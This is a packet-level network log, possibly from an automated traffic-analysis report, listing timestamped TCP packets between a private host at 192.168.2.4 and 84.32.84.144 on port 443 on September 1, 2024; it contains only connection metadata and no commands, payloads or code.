Sep 1, 2024 18:27:59.106693983 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.106698990 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.106717110 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.106720924 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.106753111 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.107784986 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.107819080 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.107840061 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.107844114 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.107851982 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.107868910 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.107882977 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.107882977 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.107892036 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.107919931 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.108647108 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.108681917 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.108700991 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.108705044 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.108711958 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.108722925 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.108755112 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.108758926 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.109613895 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.109648943 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.109659910 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.109663963 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.109678984 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.109687090 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.109704971 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.109707117 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.109715939 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.109733105 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.109764099 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.110573053 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.110605955 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.110627890 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.110630989 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.110641003 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.110645056 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.110670090 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.110692978 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.110698938 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.110709906 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.110735893 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.111574888 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.111608982 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.111623049 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.111627102 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.111638069 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.111654043 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.111671925 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.111675978 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.112520933 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.112552881 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.112581015 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.112600088 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.112603903 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.112611055 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.112627029 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.112653017 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.112657070 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.149123907 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.149375916 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.149444103 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.149451017 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.196289062 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.196352959 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.196522951 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.196530104 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.196773052 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.196799994 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.196822882 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.196829081 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.196849108 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.197134972 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.197160959 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.197210073 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.197216034 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.197627068 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.197655916 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.197678089 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.197683096 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.197699070 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.198199987 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.198230028 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.198254108 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.198254108 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.198261976 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.198266029 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.198304892 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.198925018 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.198957920 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.198975086 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.198977947 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.198987961 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.198997974 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.199017048 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.199028015 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.199032068 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.199054956 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.199067116 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.199784994 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.199812889 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.199834108 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.199839115 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.199877024 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.199892998 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.200365067 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.200397968 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.200416088 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.200419903 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.200427055 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.200440884 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.200450897 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.200459957 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.200464010 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.200506926 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.200506926 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.201317072 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.201356888 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.201375008 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.201379061 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.201387882 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.201400042 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.201419115 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.201427937 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.201431990 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.201457024 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.201474905 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.202271938 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.202306986 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.202327013 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.202330112 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.202341080 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.202354908 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.202363968 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.202382088 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.202387094 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.202404022 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.202424049 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.203129053 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.203187943 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.241622925 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.241650105 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.241789103 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.241789103 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.241792917 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.286979914 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.287095070 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.287292004 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.287297964 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.287456036 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.287483931 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.287504911 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.287511110 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.287520885 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.287774086 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.287807941 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.287856102 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.287859917 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.288439989 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.288501024 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.288505077 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.288660049 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.288691998 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.288714886 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.288718939 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.288726091 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.288734913 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.288765907 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.288769960 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.289321899 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.289355040 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.289366007 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.289370060 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.289386034 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.289400101 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.289418936 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.289437056 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.289442062 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.290242910 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.290270090 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.290277958 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.290292978 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.290297031 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.290308952 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.290323019 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.290349007 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.290353060 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.290404081 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.291114092 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.291148901 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.291167021 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.291172028 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.291179895 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.291194916 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.291208029 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.291215897 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.291219950 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.291261911 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.292038918 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.292073011 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.292088032 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.292095900 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.292109013 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.292115927 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.292135954 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.292138100 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.292146921 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.292165995 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.292202950 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.292968988 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.293003082 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.293019056 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.293023109 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.293031931 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.293036938 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.293065071 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.293076992 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.293081045 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.293107986 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.293123007 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.293742895 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.293797970 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.333036900 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.333091021 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.333139896 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.333148956 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.333288908 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.379765034 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.379796028 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.379966021 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.379972935 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.380251884 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.380285978 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.380305052 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.380309105 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.380317926 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.380337000 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.380362034 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.380364895 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.381167889 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.381202936 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.381217957 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.381222010 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.381232977 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.381252050 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.381259918 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.381283045 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.381289005 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.381304979 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.381416082 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.381452084 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.381467104 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.381470919 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.381485939 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.381510019 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.381514072 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.381520987 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.381534100 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.381572962 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.381576061 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.382544041 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.382577896 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.382591963 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.382596016 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.382616997 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.382627010 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.382647038 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.382649899 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.382659912 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.382675886 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.382714987 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.383012056 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.383042097 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.383057117 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.383060932 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.383078098 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.383085966 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.383090019 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.383101940 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.383105040 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.383138895 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.383172035 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.383971930 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.384006023 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.384020090 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.384022951 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.384038925 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.384046078 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.384064913 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.384067059 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.384074926 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.384094000 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.384131908 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.384829044 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.384862900 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.384876966 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.384881020 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.384892941 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.384901047 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.384939909 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.384943008 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.385668039 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.385715961 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.385720968 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.386775970 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.424019098 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.424134970 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.424197912 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.424204111 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.424215078 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.426773071 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.470555067 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.470587015 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.470621109 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.470626116 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.470669985 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.470746994 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.470797062 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.470952988 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.471012115 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.471302986 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.471335888 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.471358061 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.471363068 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.471388102 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.471406937 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.471664906 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.471697092 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.471715927 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.471721888 CEST	443	56171	84.32.84.144	192.168.2.4
